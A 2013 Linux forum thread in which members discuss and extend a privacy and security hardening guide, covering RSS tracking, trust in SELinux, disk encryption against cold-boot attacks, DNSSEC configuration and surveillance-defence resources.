SEARCH

Enter your search query in the box above ^, or use the forum search tool.

You are not logged in.

#76 2013-03-15 14:10:59

sorcerer's_apprentice
#! Junkie
From: oblivion
Registered: 2013-02-09
Posts: 293

Re: The paranoid #! Security Guide

Bradi wrote:

It appears that feedburner can be trusted to the same extent as any other Google service. As far as I'm aware they do not gather data specifically for each browser. I am OK with using feedburner feeds.
This is not the case with Mediafed. As shown by the unique Image URLs they do track every browser individually, which I think is against the interests of the consumer (me). This is why I make sure never to download images in feeds from Mediafed, and inspect the source code of any new feed before adding it. I have also refrained from using a feed from another website that I like, because they use mediafed as their default proxy, generating a unique article url for every browser.

Concerning the web-bugs newsbeuter will help as it only downloads text. It is run in the terminal and not in your browser. So no tracking there.

Apart from that I suppose the only option is to either use a VPN or TOR if you don't want fb/mf to acquire information about the news-sources you are using.

Offline

Be excellent to each other!

#77 2013-03-16 12:52:15

Bradi
#! CrunchBanger
From: Poland
Registered: 2013-01-21
Posts: 115

Re: The paranoid #! Security Guide

Thank you, sorcerer's_apprentice, for your help.

I will conclude this discussion by saying that there are some tracking threats when using newsfeeds.
How real these threats are is up to personal assessment. It is good to know about this and if you don't like it, take some steps: use a text-only newsreader or avoid a particular feed altogether.

Also, there's a great guide I found for the links section:
EFF's surveillance Self-Defense - a comprehensive guide about possible surveillance techniques and how to defend against them. Focuses specifically on the US legal system, but the general principles are applicable everywhere.

Offline

#78 2013-03-16 15:01:24

sorcerer's_apprentice
#! Junkie
From: oblivion
Registered: 2013-02-09
Posts: 293

Re: The paranoid #! Security Guide

Bradi wrote:

Thank you, sorcerer's_apprentice, for your help.

I will conclude this discussion by saying that there are some tracking threats when using newsfeeds.
How real these threats are is up to personal assessment. It is good to know about this and if you don't like it, take some steps: use a text-only newsreader or avoid a particular feed altogether.

Also, there's a great guide I found for the links section:
EFF's surveillance Self-Defense - a comprehensive guide about possible surveillance techniques and how to defend against them. Focuses specifically on the US legal system, but the general principles are applicable everywhere.

You're welcome.

I added a section on RSS to the guide and also linked to the EFF's Self-Defense guide in the link-section.

Offline

#79 2013-03-19 20:40:36

foxtrot
Member
Registered: 2013-03-19
Posts: 15

Re: The paranoid #! Security Guide

Great guide, thanks!


yikes not quite sure

Offline

#80 2013-03-19 21:21:16

JLloyd13
#! Member
Registered: 2012-08-08
Posts: 83

Re: The paranoid #! Security Guide

any plan on including selinux in the guide? I found it annoying on Fedora but it could be usful for this. Debian has support but it's isn't installed/enabled by default

Offline

#81 2013-03-20 00:35:09

sorcerer's_apprentice
#! Junkie
From: oblivion
Registered: 2013-02-09
Posts: 293

Re: The paranoid #! Security Guide

foxtrot wrote:

Great guide, thanks!

You're welcome, foxtrot.

JLloyd13 wrote:

any plan on including selinux in the guide?

Yes and no. I actually planned on including it - but then I did some deeper research on it which lead me to conclude not to do it. I still haven't made my mind up completely but I tend to much rather include manuals for AppArmor and grsecurity.

Offline

#82 2013-03-21 07:36:47

Jajetz
New Member
Registered: 2013-03-17
Posts: 6

Re: The paranoid #! Security Guide

I just switched from windows to Linux about 2 weeks ago. Oh man I was missing so much. I went from Ubuntu 12.10, then Mint 14.1, now i'm looking to switch to security oriented desktop Distro.

This guide has helped me a great deal, so thank you sorcerer's apprentice!

The way I see it is that there are 4 types of users.
1. Privacy: On two USBs: one for TAILS, and other for data. (Just like Applebaum suggests)
Use Tails off-site -> communicate/data -> get out
2. Offensive: Kali
Use Kali off-site -> exploit -> get out
3. Server Encryption then (Defend Router, OS and services)
4. Desktop Encryption then (Defend Router, OS and Browser and Applications)

Which Distros are recommended for server and desktop? Maybe 3 each.

Full Disk Encryption:
/boot/ and grub vulnerable. I like the USB solution, did it work for you?

Why not a fail-safe password that would just delete the HDD? So that if forced/tortured, you can give them the password that wipes the HDD. (yes, torture is pretty popular yikes nowadays)
Why not after boot, create 99 of these fail-safe password/key and put them in memeory along with real one. When cold-boot happens, the guys will see 100 keys, so now instead of 100% they have 1% chance of getting in and 99% of wiping the HDD.
Storage of key in CPU rather than memory?

Firewall configuration for router after installing dd-wrt or openwrt?

theres alot more needed for snort, tiger, tripwire

A security oriented congyrc, with connections(in/out), processes, maybe snort alerts, CVEs etc...

UFW rules?

In ICMP Settings you have one line that repeats.

Offline

#83 2013-03-22 15:42:11

sorcerer's_apprentice
#! Junkie
From: oblivion
Registered: 2013-02-09
Posts: 293

Re: The paranoid #! Security Guide

Jajetz,

thanks for your reply.

3): I would suggest OpenBSD/FreeBSD/Debian.

4): I don't really know what you want to get at with "desktop encryption". If you stick with #!/Debian and this guide (and/or others of course) you will reach a high security desktop environment. But to name three: Debian/Gentoo/*BSD. It all comes down to configuration - so it is not very helpful to appoint any distro to be more secure than another. Debian can be hardened quite a bit - same with Gentoo and a lot of others. If you absolutely surely know what you're doing and are well aware of latest bugs and exploits you could even run Arch as a secure system.

The idea with the fail-safe passwords on boot is cool. But you don't need to delete the drive. It is enough to destroy the key. But anyway - are you going to implement this? wink

DD-WRT firewall configuration -> coming up.

Snort/Tiger/Tripwire configuration -> coming up.

Security related conky is a great idea. But my knowledge of conky is rather slim. So don't expect anything the like soon - or help build it.

UFW -> UFW/GUFW just controls iptables. I will at some point include some more detailed iptables know-how - but for now ipkungfu is strong enough. Iptables stuff is coming up on the DD-WRT update anyway. BTW: It is much more important to set up your router-firewall correctly - so that in theory - almost nothing else unwanted reaches your machine in the first place.

ICMP-rules: Could you tell me which one?

Offline

#84 2013-03-30 04:59:33

Jajetz
New Member
Registered: 2013-03-17
Posts: 6

Re: The paranoid #! Security Guide

First I really think the guide should be built on and organized according to http://www.auscert.org.au/5816

Encryption:
Considering a fail-safe: flooding memory with fake keys and a fail-safe makes certain assumptions, renders effert useless considering common forensive practices. Basically, the last thing forensics wants to do is boot up your OS! Deletig memory is the only solution (for time being), and lo and behold TAILS has come to the same conclusion. So, we need to follow TAILS' shutdown procedure, though they still need to fix some issues.

SELinux:
    SELinux was developed on December 22, 2000 by the NSA. Consider the following on the question to trust SELinux:

    NSA strategy can be culminated to 3 fronts: defensive, offensive, and deception (counter-intelligence). Considering that the primary mission of the NSA is offensive, intelligence collection and data minning of targets (foreign public/government, and domestic public), should we trust SELinux? Well the answer lies in another question: in which category was SELinux developed considerng the NSA mission framework?
    I Argue: that SELinux lies in the defensive front of NSA strategy, hence a legitimate security measure for all.
        Rationale:
            1. SELinux is open source. Available to all as open source.
            2. More than 12 years in the field.
            3. Widely accepted and used by security professionals, both government and corporate environments.
            3. Insignificant exploits found (CVE-2009-2695, CVE-2008-3234, etc).

        SELinux does not contradict the overall NSA mission (specifically, offensive objectives):
            Designed for a global minority: Linux users. (4.8% according to http://www.w3schools.com)
            Designed for a global minority of a minority: complex and hard to implement, the only linux users that implement SELinux are government and corporate (those can afford know-how) entities.
            Designed for a global minority of a minority of a minority: developed nations, with the know-how to implement SELinux are a minority highly-developed nations (US and Europe, with a catching up Russia and China) of overall.
   
            Hence, SELinux accomplishes both NSA offensive and defensive objectives, and does not contradict its offensive mission (domestic public, foreign government/public targets).
       
        For these reasons:
            We should fully trust SELinux as a legitimate security structure.
            We should expand SELinux beyond the confinments set forth by its developers (NSA), to include default inclusion in all Linux distros, then to all desktop users (no matter of OS).
            We should trunk/branch it with a mission default for all OSs.

ICMP:
    This line appears twice: net.ipv4.conf.all.send_redirects = 0

Offline

#85 2013-03-30 11:46:58

sorcerer's_apprentice
#! Junkie
From: oblivion
Registered: 2013-02-09
Posts: 293

Re: The paranoid #! Security Guide

Jajetz wrote:

First I really think the guide should be built on and organized according to http://www.auscert.org.au/5816

Well, that's a neatly structured manual.

As far as building on it is concerned there is a slight problem:

AusCert wrote:

The material on this web site is covered by copyright. Apart from any use permitted under the Copyright Act 1968, no part may be reproduced or distributed by any process or means, without the prior written permission of AusCERT.

The structure itself is a little too narrow for the purposes of this guide, I think. But maybe you could explain how exactly you think of this guide needing to be built on and organized according to the one by AusCERT. That would be helpful.

Jajetz wrote:

Encryption:
Considering a fail-safe: flooding memory with fake keys and a fail-safe makes certain assumptions, renders effert useless considering common forensive practices. Basically, the last thing forensics wants to do is boot up your OS! Deletig memory is the only solution (for time being), and lo and behold TAILS has come to the same conclusion. So, we need to follow TAILS' shutdown procedure, though they still need to fix some issues.

While being true there isn't really much we can do about this now, is there? Apart from using TAILS or trying to follow the advice I mentioned in the encryption section - hoping that it is enough when you need to rely on it. Or did you reach any other practical conclusion?


Jajetz wrote:

SELinux:
    SELinux was developed on December 22, 2000 by the NSA. Consider the following on the question to trust SELinux:
   
[...]   
        For these reasons:
            We should fully trust SELinux as a legitimate security structure.
            We should expand SELinux beyond the confinments set forth by its developers (NSA), to include default inclusion in all Linux distros, then to all desktop users (no matter of OS).
            We should trunk/branch it with a mission default for all OSs.

That doesn't convince me as much as Thomas Drake urging us not to "use any encryption system that has a government stamp on it". While SELinux isn't an encryption system it still has that stamp.

Here is a discussion about trust issues with SELinux.

Kerry Thompson wrote:

Basically you can trust SELinux quite a lot - because all of the code is open source and there is a lot of people looking at it and working on it. A lot of those people aren't in the US, and if they found something they would certainly tell everybody about it.

On the other hand, there is a *lot* of code in SELinux and the policy files and it will probably contain mistakes. There probably hasn't been any exhaustive audit of the code - but since SELinux has been incorporated into the 2.6 kernel you can assume that plenty of people around the world have looked through it. And there are tools (not written by the NSA) that can audit the policy rules.

If the NSA did put something in, it would eventually be found and such a discovery would be extremely damaging to the NSA. I think if they wanted to hide something, they wouldn't have released the source code.

Another discussion can be found on Bruce Schneier's blog.

I am willing to change my mind for a good argument - but I haven't come across something really convincing both in terms of trust and practicability of SELinux. But as I wrote everyone is welcomed to contribute to the guide. So if you would like to see SELinux incorporated into it you can provide a manual for it and we can simply put up a disclaimer with all the issues raised so that people can decide for themselves on what to do.

Jajetz wrote:

ICMP:
    This line appears twice: net.ipv4.conf.all.send_redirects = 0

Deleted. Thanks!

Offline

#86 2013-03-31 22:33:27

Jajetz
New Member
Registered: 2013-03-17
Posts: 6

Re: The paranoid #! Security Guide

Ah didn't see the copyright, doesn't mean we can't add some concepts mentioned in it! I am following your guide but I often had to jump from one thing in the guide to another. For example, further securing data with truecrypt should be at the end, I really don't need to know this if I haven't even setup my OS.
Unfortunately I have to eventually reinstall OS, because: Should we use seperate partition for / /home /tmp etc? Instructions for USB solution?
I created a security.text file and structured it as follows: (many things are missing, because I didn't get there yet)

I think we should start router, OS, Applications, audit, IDS, SeLinux/apparmor/grsecurity, upkeep, and finally notification systems.

Router:
    Wired vs Wireless
    Open Source firmware: dd-wrt, openwrt, tomato
    Configuration:
        MAC-filters
        Disable UPnP, ping
        Firewall: ??

BIOS password: USB solution for full disk encryption, changes bios setting recommendations for USB booting?

Encryption:
    Software
    Hardware
    Attacks:
        Software
        Hardware
    Solution

OS:
    Choosing OS: Consider computer role, security needs of each data handled, trust relationships, uptime requirements, minimal needed software packages and net access. (Part A of the checklist)
        Offensive: Kali
        Privacy: TAILS
        Desktop
        Server
    Installation:
        Download from trusted source
        Checksum
        Install from trusted media (Section B1 of the checklist)
        Install while not connected to the internet (Section B2 of the checklist)
        Use Seperate partitions (Section B3 of the checklist)
        Full Disk Encryption
            /boot on usb?
    sudo/sudoers
    Minimize/Uninstall services and packages you might need: (Part D in the checklist)
        Find out which services are running that you don't need.   
        common ones are CUPS, Samba, Avahi-daemon, dnsmasq
    ICMP settings
    DNS settings
    Anti-virus
    Firewall

    Update and Upgrade
        Trusted /etc/apt/sources.list
        Check integrity of installed packages

    Setup a shutdown scheme that wipes memory fast and clean, to deal with cold boot

Applications:
    Browsers
    Email / Encryption
    Communication: Jitsi, pidgin/otr
    Encrypted data: truecrypt, etc

Security Audit:
    nmap
    tiger

IDS:
    snort
    chkrootkit
    psad

SELinux, AppArmor, grsecurity?

Upkeep
    Daily, weekly and on-demand operations
    Automate what you can
    Logs

Notification systems:
    conkyrc
    email notifications

Offline

#87 2013-03-31 23:12:02

Jajetz
New Member
Registered: 2013-03-17
Posts: 6

Re: The paranoid #! Security Guide

TAILS is having the same debate and it would be interesting to see which Mandatory Access Control they pick:
https://tails.boum.org/todo/Mandatory_Access_Control/

Sandfox: generally untested/unused, only one developer, the developer has moved to another project for a while now, it does not sandbox tabs, chrome sandbox exploited not long ago in a competition (those guys made good money on the prizes).
   That said I really like the idea, but it really needs to be put to the test just like chrome's sandbox.

That said, theres way too many exploits on SET and Metasploit involving browsers and websites. So this issue needs to be addressed.
    Please add a warning for Java to the browser section, many exploits keep popping up for it.

Cheers!

Offline

#88 2013-04-01 04:06:57

cyberhood
Member
Registered: 2012-07-19
Posts: 45

Re: The paranoid #! Security Guide

@jajetz

I like the order you presented.

As far as trusting code published by the No Such Agency...  neutral

...it'll take time for us to audit all their code, and I don't doubt -considering their size, manpower & resources- that they know their code backwards and forwards and that even if it seems bulletproof to us on the surface, they probably have the processing power and algorithms to crack into it; it is their child after all...

Last edited by cyberhood (2013-04-01 04:10:51)

Offline

#89 2013-04-06 05:59:48

Jajetz
New Member
Registered: 2013-03-17
Posts: 6

Re: The paranoid #! Security Guide

@ cyberhood

In determining value of SELinux, AppArmor, or grSecurity consider section A of http://www.auscert.org.au/5816

Consider this hypothetical scenario: "A.1" = ability to access sensitive text documents, "A.2.1" = sensitive text documents, "A.2.2" = NSA.
Obviously, you do not need SELinux or any other MAC according to "A.5 Determine minimal software packages required for role", having internet anywhere near it is just suicide according to "A.6 Determine minimal net access required for role." In other words, you shouldn't have more than an encrypted USB with the sensitive documents, a decrypt program, vi, a screen, an input to put your password and navigate, and a battery. VI is overkill in this task, considering you only need to read the document and certaintly not write. Do you even need a full distro or rather just a bunch of  packages? A laptop, rasberry-pi, or just 2 input/output devices?

The last 10 years have been a bit of a rollercoaster, a decade in the making, from rendition, torture, and controversial court proceedings to today's assassinations of citizens. https://www.youtube.com/watch?v=T0vFmudJdWI
It is illegal and unconstitutional for our government to assassinate its own citizens, and certainly a child, but today that is "legal", because no one spoke up! Now, do you really think NSA cares to waste its time/effort (some NSA employees consider that taxpayer money) trying to exploit your SELinux box for a set of data they value??? No, they will refer you to the FBI / CIA, and they can do so many thing to you, "legal" things, that will make regret you even had that data to begin with!

This is exactly why I said I trust SELinux! SELinux is a product of our best minds working for a signal intelligence agency bigger than the FBI/CIA combined, bigger than that of the equivalents of the next top 10 nations combined. A product remcommended by DOD and used by government, defense industry, etc. An open source product that for the last 10 years has stood its ground against all.
...BUT I would never use it to secure a wikileaks box or a foreign govenment computer!

I think sorcerer's_apprentice guide is great at getting started at privacy issues.

---

That said: NSA is not some evil entity out there to get you! ...but they do have to follow orders from policymakers, voted into office by the people!
I think one of the best things you can do is write an email to yourself, address it to NSA, and just tell them frankly what you think. It's what i did 9 years ago! It's been recently recommended by William Binney.

---

Policymakers at it again!!! NSA is on a recruitment frenzy right now and they are targetting defcon, other cons, and everywhere else. They are making a big push for cyberwarfare. The idea is cyberwarfare / drones / and cyberterorism. They even have their own "realm", the cyber real with a new 4 star general. This new realm will join the Army, Navy and Air commands.

cheers smile

Offline

#90 2013-04-15 06:02:31

Jajetz
New Member
Registered: 2013-03-17
Posts: 6

Re: The paranoid #! Security Guide

Please add DNSSEC: to DNS section, and recommend box/router/server implementation accordingly:
   The german computer chaos club don't use HTTPS nor DNSSEC.
---
Router:
    OpenWRT:
        Unbound DNSSEC resolver:
        https://apuntesderoot.wordpress.com/201 … n-openwrt/

OS:
    DNS Settings:
        Test DNS servers:
            https://www.grc.com/dns/dns.htm
            DNSSEC: http://dnssec.vs.uni-due.de/
                http://dnssectest.sidn.nl/

        sudo gedit /etc/resolv.conf
            # List: https://anonymous-proxy-servers.net/wik … NS_servers
            # German Privacy Foundation e.V. (DNSSEC, HTTPS)
            # http://www.privacyfoundation.de/projekte/https_dns/
            nameserver 94.75.228.29
            # AWXCNX (DNSSEC, HTTPS)
            # https://www.awxcnx.de/
            nameserver 62.75.219.7

        Prevent (even root) from overwritting file on system restart:
            sudo chattr +i /etc/resolv.conf
   
        Enable writting file:
            sudo chattr -i /etc/resolv.conf

        Test: http://otrs.menandmice.com/otrs/public. … ItemID=111
            DNSSEC domain: returns a AD-Flag (Authenticated answer) set in the header
                dig pir.org +dnssec +multi
            Broken DNSSEC domain: returns SERVFAIL returncode without DNS data.
                dig www.dnssec-failed.org
            NO-DNSSEC domain: returns a normal DNS answer.
                dig www.google.com +dnssec

Applications:
    DNSSEC: https://wiki.archlinux.org/index.php/DNSSEC

-----

been testing OTR with Jitsi on Kali Linux:
   My experience:
      I received an attack from country X's national internet provider, I tracked it to their "security department"  and the attack crashed jitsi and hence end my OTR communication. What surprises me, is that country X is a 3rd world nation!

-----

[dot]
If you are around DC and want to chill contact me at jajetz@gmail.com
Cheers!

Last edited by Jajetz (2013-04-15 14:23:35)

Offline

#91 2013-04-15 11:00:24

sorcerer's_apprentice
#! Junkie
From: oblivion
Registered: 2013-02-09
Posts: 293

Re: The paranoid #! Security Guide

Jajetz and Cyberhood,

thanks for your contributions. I have been a bit busy lately. I will update the guide with your recommendations asap, i.e. in the next few days.

As far as a different structure is concerned I'm O.K. with that but will need some time to implement it.

I will reply with a more detailed comment soon. Just to let you know that I'm still around. wink

Offline

#92 2013-04-17 10:34:53

xaris
Member
Registered: 2013-04-17
Posts: 33

Re: The paranoid #! Security Guide

Thank you, sorcerer's_apprentice! Really great guides. There are many useful things that I'll start doing right now.


Simplicity is prerequisite for reliability. - Edsger W. Dijkstra

Offline

#93 2013-04-17 11:25:39

wilde_wurst
New Member
Registered: 2013-04-17
Posts: 2

Re: The paranoid #! Security Guide

Hello World,
Copy and paste does not necessarily mean that you really get what you see!
http://www.ush.it/team/ascii/hack-trick … u_copy.txt
http://www.heise.de/security/dienste/Co … 42691.html
Linux users when copy & paste should be careful.

Last edited by wilde_wurst (2013-04-17 11:27:44)

Offline

#94 2013-04-18 09:46:11

Darksoul71
New Member
Registered: 2012-03-07
Posts: 9

Re: The paranoid #! Security Guide

@sorcerer's_apprentice: Thanks for this great guide ! Lots of stuff to read and keep one busy for days  big_smile

@wilde_wurst: So the pragmatic approach would be to copy anything you do not trust to a texteditor of your choice and verify the content, right ?

Offline

#95 2013-04-19 08:53:26

wilde_wurst
New Member
Registered: 2013-04-17
Posts: 2

Re: The paranoid #! Security Guide

Darksoul71 wrote:

@wilde_wurst: So the pragmatic approach would be to copy anything you do not trust to a texteditor of your choice and verify the content, right ?

I would say yes but I'm not a security expert ;-)

Offline

#96 2013-04-20 23:31:33

Jajetzo
New Member
Registered: 2013-04-20
Posts: 1

Re: The paranoid #! Security Guide

The Arguments: If you use a phone, its okay to use facebook!

Sadly an 8 year-old kid passed away in Boston, may he rest in peace. A tragedy, yet a part of daily life in Iraq, Afghanistan, and Syria.

As an analysis of the FBI investigation, one cannot ignore the emergence and prominence of the cyber world, both machine and software.
1. Internet: There have been numerous references to the Internet, by media reporters, politicians, and government officials. Specifically, Inspire magazine, the al-Qaeda version of the Anarchist Cookbook. What is more pertinent here is what lurks in the undertone, a massive push for government "control" and militarization of the Internet. A Cyber theater trying to squeeze and define itself in a military structure that for centuries was divided amongst three: Army, Navy, and Air. In an effort to distinguish himself from his peers, General Keith Alexander, regardless of strong CIA opposition, orders in May 2010 an operation to take down a joint Saudi-US honeypot website used to lure Saudi dissidents. Meanwhile Stuxnet was working in the background as proof of concept. A general needs weapons, bunkers, and certainly law. CISPA is back, with minute modifications, and was just passed in the House yesterday, April 18, 2013. There is a strong probability it will pass in the Senate.

Nmaping nsa.gov or breaking into your neighbor's wifi might get you a fine and 20 year in jail. Cyber Intelligence Sharing and Protection Act (CISPA) S. 2151. http://thomas.loc.gov/cgi-bin/query/z?c112:S.2151:
Senate confirmation of Keith Alexander. May 11, 2010. The Washington Post. http://www.washingtonpost.com/wp-dyn/co … 05251.html
General Keith Alexander's first operation. May 22, 2010. The Guardian. The Guardian. http://www.guardian.co.uk/world/2010/ma … re-general
Stuxnet: http://en.wikipedia.org/wiki/Stuxnet

2. CCTV: perhaps cctv is prominent in England, but it hasn't really taken a foothold here at home. Most of the initial pictures provided publicly by the FBI originated from outdated VGA surveillance equipment. The pictures themselves were rather unclear and hardly useful for human or software-based facial recognition. CCTV is a short sighted and leads us to 3, drones!

3. drones: why waste time with CCTV, chasing criminals with helicopters, it seems to be such a waste of resources and personnel when you can just have drones circling overhead tracking multiple targets in real-time! Drones can be implemented with facial recognition, weapon and bomb detection, it can detect weapon discharges, and knock out land, sea or air targets with a laser from the sky.
Drones will call an ambulance when you have an accident and lie unconscious on the floor alone, the fire department when your house has caught fire in the middle of the woods. They will even relay traffic live traffic jams ahead on your trip to DisneyLand!
I was driving in a 4-hour trip one time, it was one of the worse snow storm the area has even known, the vehicle in front of me went out of control and crashed, I pumped the breaks and was able to stop, the girl driving was just fine and minor damage to the vehicle, but she was in shock. The only thing I did was help, calm and comfort her, and call the police/ambulance. The girl tracked me down somehow, showed up at my apartment door a month later, and called me a "guardian angle". The point is people are emotional beings, they will come to refer to those drones overhead as "guardian angles".
In terms of domestic drones, this principle will be exactly how government (or lockheed martin, boeing, ratheon, etc) will "sell" the idea to citizens, and eventually our children will perceive drones as ambient objects in the sky, similarly to our perceptions today of a stock ticker in Times Square.
Perhpas drones didn't play a role in Boston! The technology might not be there yet, the jurisdiction doesn't allow it, or maybe they simply didn't get there on time! But...the day will come when domestic drones will have their day, the masses will love them, and that privacy; of simple being able to walk outside your home without being registered in a database; will become a luxury of the past. Drones will facially recognize you, track you in the background, register who you interact with, where you work, where your kids go to school, where you shop, they can even tell if you are having sex in your bedroom!

------------
If you have read this far, take a moment and breath in and out! Collect yourself so that we may take another leap of faith into that rabbit hole.


We now consider the other end of this equation, the world transformes and our priorities realign to place us in the shoes of government. All you see are threats everywhere and your goal is to somehow keep it from going to pure chaos.

Tomorrow's criminal will not wait for that cloudy day to come out and do his bidding, he will adapt!
The future robber will not storm a bank like the Joker in a Batman movie, pump a shotgun, and ask the teller to place the money in a gray cloth bag. The future bank robber will send two drones from a remote location, one armed with a weapon or even explosives and the second drone with a hook, he will ask the teller to place the money in a bag and hook it to the second drone, or else the first drone will not be happy. The second drone will link up with the bank robber and be long gone, while the first drone will be left as a guarantee for a clean escape.
The future gang member, hit-man, or assassin will just mount a gun with a silencer on a drone and send it to your home, bypassing all your dogs/security cameras/traps/whatever. Take you out and leave no shred of evidence behind.
Police will be able to pinpoint you on the scene of the crime and with the weapon in your hand and the prosecution will play a movie the crime as it took place.
Tomorrow's soldiers and wars? Well, this is happening now.
Tomorrow's terrorist, well this is where it gets interesting, but i'll just say pressure cookers will be considered as bows and arrows! A kid+drone wll own you!

Hence, the messure of control that government always seeks is simply a reaction to counter all these threats and hope to keep an edge over the future bankrobber/terrorist/whoever. 90% of it is just psycological warfare and tactics, the remaining 10% is real. Yes, one can argue that the mistakes of government are the reason many of these threats exist, but it certainly not all of them.

The aim here in considering different points of view, is really for you as an individual to understand where you lie in all this, because at the bottom line that is the only thing that really matters.

------------
It might seem to you that this is a bit of science fiction, but I assure you that this is the very near future if we aren't living it right now. When I was a kid I built a Gokart with my dad, a mighty fast one smile, today's kids and fathers build drones.

Military, terorism, and crime. FPSRussia. https://www.youtube.com/watch?v=SNPJMk2fgJU
Defcon 20: Hacker + Airplanes. http://www.youtube.com/watch?v=CXv1j3GbgLk
Watch Team Blacksheep's drone kissing lady liberty in NYC, or the French Paparazzi Drone. Journeyman. http://www.youtube.com/watch?v=20JCGDwBt7A
Robot Wars. Aljazeera. http://www.youtube.com/watch?v=TyJoJUs14bc
Drone facial recognition. Wired. http://www.wired.com/dangerroom/2011/09 … et-a-face/
Remote operation of drones (a soldier here operating a Reaper drone in Afghanistan). Aljazeera. http://www.youtube.com/watch?v=SdQvF5xmKL4
Domestic drones. Aljazeera. http://www.youtube.com/watch?v=QTLtNgSRXyc
Obama's drones. Aljazeera. http://www.youtube.com/watch?v=m36FYr8YBCI
Drones and civilians. Aljazeera. http://www.youtube.com/watch?v=B2j4K6-JKgs

You have 2 years tops until the relationship CCTV:Facebook will become Facebook:Drones.
You can play around with facebook, create fake profiles, fake social network, modify the metadata (GPS, time, etc), spoof ur ip, and upload a picture where facebook/whoever think you are really in the North Pole. With drones, all bets are off!

------------
Sorry...a long way to make a point, and my wierd brain operates by taking the long-road: "social-media section" should be removed entirely.
Replace it by a strong introduction that explains to user:
1. Total security and privacy do not exist.
2. Develop a strategy.
3. Establish control by using open-source software/hardware, and data/application encryption.
4. Use applications/services that implement principles of security and privacy by design.
    Do not expect privacy and security in services like facebook, tweeter, skype, gmail, most of the cloud, apps on your iphone/android, irc, flash, etc.
    Understand that certain services come at a cost, and exactly what those costs are. Cost/benefit analysis.
        For example,
            phone: location, your communications, your voice signature, social interactions, relationships, movement patters, etc
            facebook: it depends what you put on it, but a facebook account used only to message people with encryption and VPN, can provide a lot more security and privacy than a phone.
            In other words, if you use and have a phone, its okay for you to use facebook, just try to keep your private thoughts and private to yourself as you attempt to persue your gossips/trolling/getting laid objectives smile

The body: solutions and solutions only. To your router, OS, applications, communications, data, common practices etc.

The rest: At your own risk! Enjoy what you have while they last!

------------
@wilde_wurst: cool and nifty little sucker! it made my day! smile

------------
Full-Disk Encryption:
    Create USB with /boot and grub. Back it up. Keep it safe.
    Use Tresor to save key on CPU debug buffer and not memory. (If your CPU supports it)
    Disable Firewire entirely or DMA part at least to avoid Tresor-Hunt attack.
    Now you can just pull the plug.

Offline

#97 2013-05-22 16:07:58

aphextwin
New Member
Registered: 2013-05-22
Posts: 2

Re: The paranoid #! Security Guide

Thanks to everyone on this thread for info.

Look at static ARP tables to prevent ARP spoofing/poisioning MITM .

Offline

#98 2013-05-23 03:31:39

cyberhood
Member
Registered: 2012-07-19
Posts: 45

Re: The paranoid #! Security Guide

Jacob Appelbaum (Part 1/2) Digital Anti-Repression Workshop - April 26 2012
Filmed April 26, 2012, 12pm. Q & A workshop with Jacob Appelbaum, computer security researcher, on mobile phone security, cellphone forensics, state repression and surveillance.

Time Code/Description:
0:00 introduction
1:05 jake appelbaum introduction to the surveillance state.
5:00 metadata, data collection, linkability
9:40 cispa
10:40 national security letter (nsl)
14:25 2703d metadata notice 18 USC § 2703(d)
16:50 audience poll on cellphones and tracking
17:40 cellphone forensics, cellebrite device
20:30 bill binney nsa, linkability, traffic analysis
24:30 cisco
25:00 controlling the narrative
25:20 stylometry, anonymouth
28:35 traffic analysis
29:20 question on cellphone tampering
30:30 gov't backdoors, US v. Jones (2012), gps tracking
33:50 question on cellphone malware, defending against passive attacks. threat models beat cop vs. nsa
35:10 nsa electromagnetic tempest attack.
40:10 question on nypd, dhs, fbi, and nsa sigint capabilities
42:00 gnu radio, imsi catcher
44:38 broken window theory, resistance and activism
49:45 question on advocacy, rules, demands. answered with church committee, accountability, ron wyden commission, no secret laws, no warrantless wiretapping, no promotion of insecure systems allowing wiretapping, and story of
51:25 lethal flying robots, due process vs. judicial process.
56:00 question on basic do's and don'ts, practical tips. rubberhose filesystem, truecrypt, usefulness/practicality of deniability passphrases, transparency.
1:02:20 question of deniability, guilty until proven innocent.
1:04:15 mutually assured information destruction (maid)
1:05:00 getting around crytography, powerline analysis attacks
1:07:10 building alternatives to commercial software and hardware. open software, open hardware, imsi catcher catcher.
1:11:40 calyx privacy-by-design isp.
1:12:55 tor network
1:15:00 mixmaster
1:16:20 tails debian

Jacob Appelbaum (Part 2/2) Digital Anti-Repression Workshop - April 26 2012
Time Code/Description
0:00 possible ways around on disclosing computer passwords by
2:20 using computer with no hard drive booting tails debian OS on usb stick
5:43 question on recommended websites for surveillance self-defense basics with mention of EFF and Tor Project
7:47 question on wiping hard drives, DBAN. also Ubuntu with encrypt option.
9:19 question on keyloggers, and outsmarting them; also a question on pranking the surveillance state/boosting morale.
10:25 WiebeTech's HotPlug mouse jiggler.
13:25 keyloggers phoning home.
15:12 mouse jiggler demo.
15:50 keyloggers phoning home con't.
17:04 Wireshark question.
19:25 tips on boosting morale, using humor, canned snakes, movie recommendations (The Lives of Others & Life Is Beautiful).
25:46 mutual aid and solidarity with those in more difficult situations.
28:01
29:00 Moxie Marlinspike RedPhone, ZRTP encrypted voip, private gsm
30:30 laser microphone & radar detector.
31:40 phone bag
32:48 TextSecure encrypted text messages for android. Off The Record messaging OTR, Pretty Good Privacy; and differences btwn OTR and PGP; compartmentalization of keys. Socialist Millionaires' Protocol authentication. jitsi, pidgin, etc.
43:00 End-to-end encryption. FinFisher backdoor, Skype. Skype privacy concerns. Jitsi alternative.
45:44 Cryptophone
46:35 iphone vs. android. free software and hardware alternatives.
48:30 Sneak and Peek search warrants, black bag operation clandestine search. retina scanning.
50:23 cryptocat
50:45 guardian project
55:00
55:38 riseup advocacy. facebook vs. we.riseup.net Crabgrass, Piggipedia
58:18 counter-surveillance extremes.
1:00:10 basic laptop encryption. mac FileVault.
1:02:05 question/concern on keylogging software. assessing and compartmentalizing threats.
1:05:15 TOR presentation and advocacy
1:11:45 one limitation of tor.
1:12:20 fbi traffic confirmation attack.
1:12:58 mixmaster system high-latency anonymity network vs. tor; using mixmaster & tor together. Len Sassaman.
1:14:51 german police dsl upgrade attack. EvilGrade (spyware -and/or malware in general- introduction through upgrades).
1:16:50 question on facebook, traffic analysis.
1:18:15 question on tor exit node option
1:19:32 question on tor sdk.
1:20:32 question on recommendations for aboveground activists. building alternatives.
1:24:34 keystroke encrypters. vpn.

*edit* now hyperlinked! I started out linking to mostly just Wikipedia articles for the background stuff, which is what is covered in most of the first video. However, projects and software -extensively covered in the second video- is generally linked to their respective main sites. Enjoy!

Last edited by cyberhood (2013-05-25 03:25:04)

Offline

#99 2013-05-26 01:49:24

aphextwin
New Member
Registered: 2013-05-22
Posts: 2

Re: The paranoid #! Security Guide

Good long workshop, thanks.

I like Appelbaum's political ideology better than other public-figure hacker I'm aware including Assange.

